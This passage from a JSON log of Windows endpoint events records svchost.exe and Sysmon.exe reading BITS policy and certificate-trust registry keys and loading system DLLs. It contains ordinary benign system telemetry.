"{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\BITS", - "registry_value": "BITS", - "timestamp": 131883570901840000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "twinapi.appcore.dll", - "image_path": "C:\\Windows\\System32\\twinapi.appcore.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - 
"registry_value": "Software Publishing", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": 
"CTLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902150000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "rmclient.dll", - "image_path": "C:\\Windows\\System32\\rmclient.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", 
